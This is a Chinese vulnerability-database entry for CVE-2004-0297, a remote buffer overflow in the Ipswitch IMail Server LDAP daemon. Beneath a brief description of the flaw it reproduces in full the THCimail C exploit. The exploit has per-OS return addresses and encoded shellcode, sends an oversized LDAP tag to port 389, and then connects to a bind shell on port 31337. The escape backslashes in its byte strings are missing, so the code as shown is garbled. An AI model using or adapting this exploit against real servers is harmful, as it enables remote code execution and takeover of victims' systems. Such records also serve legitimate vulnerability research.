Ipswitch IMail Server LDAP守护进程远程缓冲区溢出漏洞

Ipswitch IMail Server LDAP守护进程远程缓冲区溢出漏洞

漏洞ID 1107756 漏洞类型 未知
发布时间 2004-02-27 更新时间 2005-05-13
图片[1]-Ipswitch IMail Server LDAP守护进程远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-2004-0297
图片[2]-Ipswitch IMail Server LDAP守护进程远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200411-149
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/157
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200411-149
|漏洞详情
IpswitchIMailserver是一款基于WEB的邮件解决方案。IpswitchLDAP守护进程不充分检查用户提供的LDAP标记,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以LDAP守护进程进程权限在系统上执行任意指令。LDAP消息由包含标记的长度和内容组成,如下的标记0x020x030x0A0x250xBD代表整数665,501(0xA25BD),如果攻击者提供的长度标记过长,当程序处理时根据标记长度拷贝用户提供的数据时缺少充分边界检查,可由于如下汇编指定而导致覆盖堆栈中内存地址:.text:00401188movbyteptr[ebp+ecx+var_4],dl精心提交拷贝数据可能以LDAP守护进程进程权限在系统上执行任意指令。
|漏洞EXP
/********************************************************/
/* THCimail 0.1 - Wind0wZ remote root exploit                                */
/* Exploit by: Johnny Cyberpunk ([email protected])                     */
/* THC PUBLIC SOURCE MATERIALS                                               */
/*                                                                                              */
/* Bug was found by idefense or some idefense slaves ;)                 */
/* http://www.idefense.com/application/poi/display?id=74&type=vuln */
/*                                                                                              */
/* compile with MS Visual C++ : cl THCimail.c                                  */
/*                                                                                              */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX,    */
/* dvorak, scut, stealth, FtR and Random                                       */
/********************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

char *WIN2KEN = "xc4x2ax02x75";
char *WIN2KPG = "xc4x2axf9x74";
char *WINXPSP1G = "xfex63xa1x71";

#define jumper "xebx06x4ax43"

char ldapshit[] = "x30x82x0ax3dx02x01x01x60x82x01x36x02xffxffxffxffx20";

char shellcode[] =
"x8bx7cx24xfcx83xc7x21x33xc9xb2x8fx66x81xc1x02"
"x02x8ax1fx32xdax88x1fx47xe2xf7x64xacxf5xe6x8d"
"x8axe3xd6x77x92x13x51x03x5exc3xffx5bx8cx7fxa8"
"xafxafxbfx87xd8xdcxbdxd0xbcxbdxa1xcbxc3xc3x8e"
"x64x8ax67x76x70x70x70xd2x0cx62xa5xe5xbfxd6xeb"
"x04x8ex04xcfx83x04xffx93x22x04xf7x87x02xd0xb3"
"x04x94x8ex74x04xd4xf7x8ex74x04xc4x93x8ex76x04"
"xdcxabx8ex75xdcxdexddx04xd4xafx8ex74xbex46xce"
"xbex4fx16x04xbbx04x8ex71x23xbex4dx5ex6dx0bx4f"
"xfax78x80x39xcax8ax02xcbxcax8bxe9xb6x9fxfax6e"
"xe9xbex9fxd5xd7xd1xd9xdfxddxa4xc1x9fxcex80x38"
"x83xc5x04x8bx07x8ex77x80x39xc2x8ax06xcbx02x57"
"x71xc2x8axfax31x71xc2x8bxfbxaex71xc2xadx02xd2"
"x97xdcx70x5fx06x48xe5x8bxd7x07xcax8ax0fxcaxf8"
"x85x02xd2xfbx0fxe4xa9x9bx66xf7x70x70x70x06x41"
"xbex54xdcxdcxdcxdcxd9xc9xd9x70x5fx18xdaxd7xe9"
"x06xbfxe5x9fxdaxd8x70xdax5bxc1xd9xd8x70xdax43"
"xdcxdaxd8x70xdax5fx18x02xcax07xdfx70xdax6bxda"
"xdax70xdax67x02xcbx8ax83x1bxdcxe7xa1xeaxf7xea"
"xe7xd3xecxe2xebx1bxbex5dx02xcax43x1bxd8xd8xd8"
"xdcxdcx71x49x8ex7dxddx1bx02xcaxf7xdfx02xcax07"
"xdfx3ex87xdcxdcxe5x9fx71x41xddxdcxdcxdcxdax70"
"xdax63xe5x70x70xdax6f";


void usage();
void shell(int sock);

int main(int argc, char *argv[])
{ 
unsigned int i,sock,sock2,addr,os,ver,rc,IMAILVER;
unsigned char *finalbuffer,*crapbuf1,*crapbuf2;
unsigned int IMAIL6_7=60;
unsigned int IMAIL_8=68;

struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;

printf("nTHCimail v0.1 - Imail LDAP exploitn");
printf("tested on Imail 6-8n");
printf("by Johnny Cyberpunk ([email protected])n");

if(argc<4 || argc>4)
usage();

ver = (unsigned short)atoi(argv[3]); 
switch(ver)
{
case 0:
IMAILVER = IMAIL6_7;
break;
case 1:
IMAILVER = IMAIL_8;
break;
default:
printf("nYou entered an illegal version !nn");
usage();
exit(-1);
}

crapbuf1 = malloc(IMAILVER);
memset(crapbuf1,'X',IMAILVER);

printf("imailver = %dn",IMAILVER);

crapbuf2 = malloc(2220);
memset(crapbuf2,'X',2220);

finalbuffer = malloc(2650);
memset(finalbuffer,0,2650);

printf("n[*] building buffern");

strcat(finalbuffer,ldapshit);

strcat(finalbuffer,crapbuf1);

strcat(finalbuffer,jumper);

os = (unsigned short)atoi(argv[2]); 
switch(os)
{
case 0:
strcat(finalbuffer,WIN2KPG);
break;
case 1:
strcat(finalbuffer,WIN2KPG);
break;
case 2:
strcat(finalbuffer,WINXPSP1G);
break;
default:
printf("nYou entered an illegal OS !nn");
usage();
exit(-1);
}

strcat(finalbuffer,shellcode);
strcat(finalbuffer,crapbuf2);

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !n");
exit(-1);
}

hp = gethostbyname(argv[1]);

if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %sn",argv[1]);
exit(-1);
}

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{ 
printf("socket() error...n");
exit(-1);
}

if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;

if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(389);

printf("[*] connecting the targetn");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,finalbuffer,2650,0);
printf("[*] Exploit send successfully ! Sleeping a while ....n");
Sleep(1000);
}
else
printf("nCan't connect to ldap port!n");

if(rc==0)
{
printf("[*] Trying to get a shellnn");
sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
mytcp.sin_port = htons(31337);
rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
if(rc!=0)
{
printf("can't connect to port 31337 ;( maybe firewalled ...n");
exit(-1);
}
shell(sock2);
}

shutdown(sock,1);
closesocket(sock);

free(crapbuf1);
free(crapbuf2);
free(finalbuffer); 

exit(0);
}

void usage()
{
unsigned int a;
printf("nUsage: <Host> <OS> <Imail Version>n");
printf("Sample: THCimail 194.44.55.56 0 1nn");
printf("OS:n");
printf("0 - Windows 2000 Server english all service packsn");
printf("1 - Windows 2000 Professional germann");
printf("2 - Windows XP SP1 germannn");
printf("Imail Version:n");
printf("0 - Imail 6+7n");
printf("1 - Imail 8n");
exit(0);
}

void shell(int sock)
{
int l;
char buf[1024];
struct timeval time;
unsigned long ul[2];

time.tv_sec = 1;
time.tv_usec = 0;

while (1)
{
ul[0] = 1;
ul[1] = sock;

l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{ 
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("bye bye...n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("bye bye...n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("bye bye...n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("bye bye...n");
return;
}
}
}
}



// milw0rm.com [2004-02-27]
|参考资料

来源:US-CERTVulnerabilityNote:VU#972334
名称:VU#972334
链接:http://www.kb.cert.org/vuls/id/972334
来源:BID
名称:9682
链接:http://www.securityfocus.com/bid/9682
来源:XF
名称:imail-ldap-tag-bo(15243)
链接:http://xforce.iss.net/xforce/xfdb/15243
来源:www.ipswitch.com
链接:http://www.ipswitch.com/support/imail/releases/imail_professional/im805HF2.html
来源:OSVDB
名称:3984
链接:http://www.osvdb.org/3984
来源:IDEFENSE
名称:20040217IpswitchIMailLDAPDaemonRemoteBufferOverflow
链接:http://www.idefense.com/application/poi/display?id=74

相关推荐: Canon ImageRUNNER Remote Port Scan Denial of Service Vulnerability

Canon ImageRUNNER Remote Port Scan Denial of Service Vulnerability 漏洞ID 1098397 漏洞类型 Failure to Handle Exceptional Conditions 发布时间…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享